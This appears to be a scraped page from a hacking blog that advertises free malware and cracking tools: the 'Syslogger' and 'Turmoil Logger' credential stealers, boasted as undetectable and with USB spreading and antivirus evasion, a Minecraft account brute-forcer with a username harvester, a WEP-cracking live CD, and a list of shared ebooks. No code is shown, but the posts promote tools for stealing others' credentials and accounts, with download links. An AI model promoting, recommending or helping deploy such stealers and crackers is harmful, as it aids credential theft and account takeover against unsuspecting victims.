Syslogger Beta [FUD] [Stealer/Clipboard logger + more]

About

I decided to release the Beta version of my logger (Syslogger). As you may notice, I didn't work on the GUI, since it's only a Beta. It's free and there will probably bugs that needs a fix, so that's why I want people to use it.

Screenshot

[Image: naamloosizf.png]

Virus scan

Builder:
File Info

Report date: 2011-06-15 16:34:56 (GMT 1)
File name: syslogger-builder-exe
File size: 900096 bytes
MD5 Hash: 76cbae1bb4ad08e5782b9b822df8855b
SHA1 Hash: 1c7220e2075973fbd76c2b7421174cbbe8750c3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -

Scan report generated by
NoVirusThanks.org

Stub:
File Info

Report date: 2011-06-16 20:50:07 (GMT 1)
File name: syslogger-stub-exe
File size: 444416 bytes
MD5 Hash: 8ad15345ddd77290a32d19350c3fae6e
SHA1 Hash: 5a7f7880e9c67117be54e79ff58b9fdaf6a8c3b4
Detection rate: 0 on 5 (0%)
Status: CLEAN

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -

Scan report generated by
NoVirusThanks.org


Download: HERE
NEW VERSION RELEASED!
http://openhacking.blogspot.com/2011/11/syslogger-beta-035-fud-stealers.html


Credits

- Soulcollector
- EVO

1 comments:

Amazing Collection of EBooks [Linux, Exploits, Networking, Programming]

This is my collection of Ebooks I have colelcted so far, decided to share it all. I've tried to keep the layout of the directories tidy.


Color Codes:
Main Folder
Sub Folder

EBOOKS INCLUDED


Exploit Folder

  • Extreme Exploits - Advanced Defenses Against Hardcore Hacks
  • Hacking - The Art Of Exploitation
  • Shellcoder's Programming Uncovered
  • The Shellcoder's Handbook - Discovering And Exploiting Security Holes


Programming Folder


  • Hacker Disassembling Uncovered
  • Learning PHP & MySQL
  • Michael - Mastering UNIX Shell Scripting

C / C++
  • C By Example
  • C In a Nutshell
  • C Primer Plus, 5th Edition
  • C-C++ Programmer's Reference, 3rd Edition
  • Cryptography In C And C++
  • Effective C++, 3rd Edition
  • Optimizing C++
  • Programming Embedded Systems In C And C++
  • Secure Programming Cookbook For C And C++

Linux
  • Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition
  • Beginning Linux Programming
  • Burtch - Linux Shell Scripting with Bash
  • Glass,Ables - Linux for Programmers and Users
  • Guide To Assembly Language Programming In Linux
  • Korn Shell Unix and Linux Programming Manual,
  • Matthew - Beginning Linux Programming
  • Mitchell - Advanced Linux Programming
  • Wall - Linux Programming Unleashed

Perl
  • Advanced Perl Programming, 2nd Edition
  • Beginning Perl Web Development - From Novice To Professional
  • Intermediate Perl
  • Learning Perl Objects, References, & Modules
  • Learning Perl, 4th Edition
  • Minimal Perl For UNIX And Linux People
  • Perl Best Practices
  • Perl Hacks - Tips And Tools For Programming Debugging And Surviving
  • Perl Medic - Transforming Legacy Code


Hacking Folder


  • Hacker Linux Uncovered
  • Hacker's Delight
  • Hacker's Guide
  • Hacker's Handbook
  • Hackers_Secrets
  • Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition
  • Hacking For Dummies
  • Honeypots - Tracking Hackers
  • The Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers

Web
  • Firefox Hacks - Tips & Tools For Next-Generation Web Browsing
  • Google Hacking For Penetration Testers
  • Google Hacks, 3rd Edition
  • Hacker Web Exploitation Uncovered
  • Web Hacking - Attacks And Defense


Networking Folder


  • Advanced Linux Networking
  • Hack The Stack - Using Snort And Ethereal To Master The 8 Layers Of An Insecure Network
  • OpenVPN - Building And Integrating Virtual Private Networks

Programming
  • Illustrated TCP-IP - A Graphic Guide To The Protocol Suite
  • Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
  • Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version.
  • Tcp Ip For Dummies
  • TCP-IP Foundations (2004)
  • TCP-IP Network Administration,
  • TCPIPTools
  • Understanding TCP-IP
  • Unix Network Programming - Volume I - The Sockets Networking API,

Security
  • Cryptography And Network Security,
  • Designing And Implementing Linux Firewalls And QoS
  • Firewall Policies And VPN Configurations
  • Fundamentals of Network Security
  • LANSecurity
  • Maximum Computer Security-A Hacker's Guide to Protecting Your Internet Site and Network
  • McGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed
  • Network Security Assessment - From Vulnerability To Patch
  • Network Security Hacks - 100 Industrial-Strength Tips & Tools,
  • Network Security With OpenSSL
  • Self-Defending Networks - The Next Generation Of Network Security


Unix Folder


BSD
  • Absolute BSD - The Ultimate Guide To FreeBSD
  • Absolute OpenBSD - Unix For The Practical Paranoid
  • Embedded FreeBSD Cookbook (2002)
  • Learning the UNIX Operating System
  • Mastering FreeBSD And OpenBSD Security
  • SysAdmin - Security Tools in FreeBSD
  • Teach Yourself FreeBSD In 24 Hours
  • The Complete FreeBSD, 4th Edition
  • The OpenBSD 4.0 Crash Course
  • Unix Power Tools, 3rd Edition

Kernel
  • linuxKernelSux
  • OReilly.Understanding.The Linux Kernel 1st Edition
  • Understanding The Linux Kernel, 3rd Edition

Linux
  • A Practical Guide To Linux Commands, Editors, And Shell Programming
  • Get_Acquainted_with_Linux_Security_and_Optimization_System
  • Hack Proofing Linux - A Guide To Open Source Security
  • Linux Basic Commands
  • Linux Kernel Development, 2nd Edition
  • Linux Kernel module programming guide 1
  • Linux Shell Scripting With Bash (2004)
  • Linux_Administration_Made_Easy
  • Linux_Administrators_Security_Guide
  • McGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU
  • OReilly - Linux_Network_Administrator's_Guide_Second_Edition
  • Sam teach you Linux in 24 hours
  • Securing Linux A Survival Guide for Linux Security Version 1.0 2003
  • Securing Linux Servers for Service Providers
  • SELinux (2004)

Shell
  • shell-scripting
  • tcsh
  • Unix Shell Programming, 3rd Edition (2003)


SQL Folder


  • Mastering_MySQL_4.2003.Sybex
  • MySQL - 2nd Edition (Sams)
  • MySQL - Essential Skills (2004)
  • MySQL - Visual QuickStart Guide, 2nd Edition (2006)
  • MySQL Certification Study Guide (2004)
  • MySQL Cookbook (2002)
  • MySQL Cookbook
  • MySQL Pocket Reference (2003)
  • MySQL Tutorial (2003)
  • MySQL.PHP.Database.Applications
  • SQL - A Beginner's Guide, 2nd Edition (2003)
  • SQL - Practical Guide For Developers (2005)
  • SQL Bible (2003)
  • SQL Cookbook (2005)
  • SQL For Dummies, 6th Edition (2006)
  • SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
  • SQL Server 2000

5 comments:

Minecraft Bruteforce v1.0

This is a brute forcing program for the up-and-coming indy game, Minecraft (minecraft.net).

To work it, login using your EndGamer forum account, click on the "Cracker" tab, and load up a username and password list. Click start and wait for the program to finish. Should there be any cracked accounts, a text file will be created in the cracker's root folder with the cracked information. This text file is never overwritten, so all new entries will be added to the file (until the file is moved or deleted).

To get users, click on the "username leecher" tab. I got kind of lazy when coding this, so so far it only supports sucking usernames from single forum threads at a time, but should this cracker become more popular I'll add an automatic leecher. To use the leecher, find an address of a thread on the official minecraft forums (http://www.minecraftforum.net/index.php) and put it in the text box. Click the grab button, and you'll have the list. The list updates itself and deletes doubles so you can put in as many threads as you like into a single list. Click export to save the file (this file can then be used as a username list for the cracker).

[Image: 64579210.png]
[Image: 45835922.png]
[Image: 40404088.png]
[Image: 27877426.png]

0 comments:

WiFi Slax Wireless Hacking Live CD v3.1 (2011)

WiFi Slax Wireless Hacking Live CD v3.1 (2011)
Windows App | Plugins Updates: 5/09/2011 | Language: ENG | 641 MB

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.
Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong"encryption while a 128 bit key has 104. The IV is placed in encrypted frame's header, and is transmitted in plain text.
Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

Basic Directions:

1- Boot from cd
2- Get the wep key
3- Write it down
4- Reboot into windows
5- Connect using wep key.

Download Link Updated!

4 comments:

Turmoil Logger | Auto Update | Stable | Stealers | UD | Encrypted | Req 2.0 | Updated | Free | #1 Logger | Icon Changer

ScreenShot:
















Functions:
[#] Encrypted Gmail
[#] Stable
[#] Easy to read logs
[#] Antis
[#] Options
[#] USB Spread
[#] Stealers
[#] Auto Update

Virus Scan:


Download:
Turmoil Logger: Click Here

0 comments: